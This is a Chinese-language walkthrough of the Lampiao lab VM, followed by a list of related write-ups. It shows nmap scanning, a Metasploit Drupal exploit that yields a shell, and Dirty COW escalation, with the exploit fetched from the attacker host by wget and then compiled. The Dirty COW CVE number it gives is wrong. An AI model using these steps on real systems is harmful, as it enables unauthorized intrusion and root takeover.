Lampiao靶机渗透测试
文章目录
- 一、信息收集
- 1.主机发现
- 2.端口扫描
- 二、漏洞挖掘
- 1.查看对方web服务
- 2.使用 msfconsole get shell
- 脏牛提权漏洞(CVE-2016-5191)
- 三、脏牛提权
- 1.在 kali 查找 exp
- 2.使用 python 传输 exp
- 3.编译利用
一、信息收集
1.主机发现
arp-scan -l
2.端口扫描
nmap -A -p- 192.168.1.120
发现开启了 22 ssh 服务
80、1898 web 服务,drupal7 框架
二、漏洞挖掘
1.查看对方web服务
访问 80 端口:
访问 1898 发现 drupal 框架
发现点击两个 Read more 会跳转到 ?q=node/1 和 ?q=node/3 ,没有 2,尝试访问 node2
发现有两个文件,尝试访问
发现 audio.m4a 是一段音频,内容为 user tiago
qrc.png 为二维码,扫描得到 Try harder!Muahuahua
2.使用 msfconsole get shell
msfconsole #进入msf
search drupal #搜索drupal框架漏洞
use 4 #使用4号漏洞
show options #查看所有设置
set rhosts 192.168.1.120 #设置目标ip
set rport 1898 #设置目标端口
run #运行
运行后得到靶机 shell,进行信息收集
shell #转换为有回显的shell
pwd
id
uname -a
发现其版本信息为 2016.7.13 < 2016.10.18,可以使用脏牛漏洞进行提权
脏牛提权漏洞(CVE-2016-5191)
漏洞范围:
内核 >= 2.6.22版本 (2007-2016年10月18日)
危害:
低权限的用户可利用这一漏洞在本地进行提权
原理:
linux内核的子系统在处理写入时复制至产生了竞争条件,恶意用户可利用此漏洞来获取高权限,对只读内存映射进行访问
三、脏牛提权
1.在 kali 查找 exp
searchsploit cow
cp /usr/share/exploitdb/exploits/linux/local/40847.cpp /root/Desktop/
2.使用 python 传输 exp
#攻击机开启服务:
python -m SimpleHTTPServer 8888
#靶机获取文件:
cd /tmp
wget http://192.168.1.122:8888/40847.cpp
3.编译利用
g++ -Wall -pedantic -O2 -std=c++11 -pthread -o 40847 40847.cpp -lutil
#-Wall 一般使用该选项,允许发出GCC能够提供的所有有用的警告
#-pedantic 允许发出ANSI/ISO C标准所列出的所有警告
#-O2 编译器的优化选项的4个级别,-O0表示没有优化,-O1为缺省值,-O3优化级别最高
#-std=c++11 按C++2011标准来编译的
#-pthread 在Linux中要用到多线程时,需要链接pthread库
#-o 40847 gcc生成的目标文件,名字为40847
总结:
1.杂乱的东西较多,但很真实,难度相对简单
2.脏牛有两个 exp:一个写文件、一个修改 root 密码,这里使用的第二个
3.上传 exp 可以直接在 msf 的 meterpreter 中 upload + /root/Desktop/40847.cpp
4.在 /var/www/html/sites/default/settings.php 中有 tiago 用户密码,但是 ssh 连接后并未找到什么信息
5.同环境,提权一次后不重启无法再次提权,重启后再次提权可能环境炸裂enmmm
Lampiao靶机渗透测试相关推荐
- DC-2靶机渗透测试流程
目录 一.DC-2靶机搭建 二.收集信息. 三.访问80端口,发现超时. 1.修改hosts文件 2.访问http://dc-2成功. 四.目录扫描,拿到重要信息. 1.使用kali自带工具dirb ...
- 靶机渗透测试(covfefe)
靶机渗透测试(covfefe) Vulnhub靶机 covfefe 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate ...
- 靶机渗透测试(Tre: 1)
靶机渗透测试(Tre: 1): Vulnhub靶机 Tre: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访问靶机. 靶机难度:(Intermediate) ...
- CH4INRULZ靶机渗透测试
CH4INRULZ靶机渗透测试 环境 工具 流程 环境 kali攻击机 192.168.1.105 靶机 192.168.1.103 工具 hackbar,netdiscover,nmap,searc ...
- DC-3靶机渗透测试
DC-3靶机渗透测试 环境搭建 kali-Linux(VMware) DC-3(VMware)靶机下载链接:https : //download.vulnhub.com/dc/DC-3-2.zip 这 ...
- 靶机渗透测试(unknowndevice64: 1)
靶机渗透测试(unknowndevice64: 1): Vulnhub靶机 unknowndevice64: 1 靶机:修改靶机的网络配置为桥接模式. 攻击机:Kali虚拟机,同样使用桥接模式,即可访 ...
- Eric靶机渗透测试通关全教程
环境准备 联不联网无所谓,主要是要在同一网段下 靶机:Eric 攻击机:Kali (192.168.56.102) 渗透目标 拿到普通用户下的flag 拿到root用户下的flag 渗透测试实战 已知 ...
- DC-5靶机渗透测试
渗透测试 靶机所需环境 信息收集 漏洞利用 上传一句话shell 蚁剑连接 权限提升 文件生成 文件一 文件二 文件三 获取root权限 靶机所需环境 目标靶机:DC-5(192.168.160.15 ...
- Eric靶机渗透测试
Eric靶机渗透练习 攻击机:kali Ip:192.168.0.3 靶机:eric Ip:192.168.0.4 找到靶机ip:192.168.0.4 nmap -sF 192.168.0.0/24 ...
最新文章
- java 构建是什么意思_构建的概念
- 用深度学习就不怕买到山寨奢侈品?LeCun投了这样一家公司
- 单击事件开启线程时,再次单击就会出现 java.lang.IllegalThreadStateException: Thread already started. 错误
- mysql分库负载均衡_订单模块以及负载均衡和分库分表
- boost::histogram::detail::tuple_slice用法的测试程序
- idea创建文件自定义注释
- Win7+IIS7下用FastCGI模式配置PHP环境
- 详细整理Spring事务失效的具体场景及解决方案
- CIF进口货物流程图_FOB、CIF和CFR,你真的了解吗?
- 深入解析Java中的装箱和拆箱
- 学习Java,真的可以月薪过万嘛?真实个人经历告诉你,记录了平时学习的内容以及学习过程中最真实的感受(五)
- ISO26262解析(六)——硬件集成测试
- SSD模型物体检测(水下生物识别)
- 指狗为马,还可骑乘?小鹏快收了你的神通吧...
- 教你做一个微信添加好友收付款的个性二维码
- 菜鸟应用-手机应用在线制作平台,手机应用,APP开发,手机软件开发
- 构造-牛客寒假集训营3-牛牛的DRB迷宫II
- AndroidID、IMEI、OAID获取
- 操作系统 --- 磁盘调度算法
- 【名字无关紧要,实战才是唯一】——吾神·娜迦卡布洛斯
热门文章
- 2022-2028年中国专用化学品行业投资分析及前景预测报告
- 2022-2028年中国内衣行业研究及前瞻分析报告
- 2022-2028年中国再生塑料颗粒行业市场全景调查及发展趋势分析报告
- OpenCV 笔记(04)— OpenCV2 升级到 OpenCV3/CV4 的改动(去掉 CV_前缀、使用新的前缀替换、使用新的命名空间宏)
- centos 7.4 上安装neo4j并测试
- TensorFlow反向传播算法实现
- Recommenders with TensorRT
- CVPR2020 论文解读:少点目标检测
- Python 实现九九乘法表
- Android ListView item设置分割线以及分割线宽度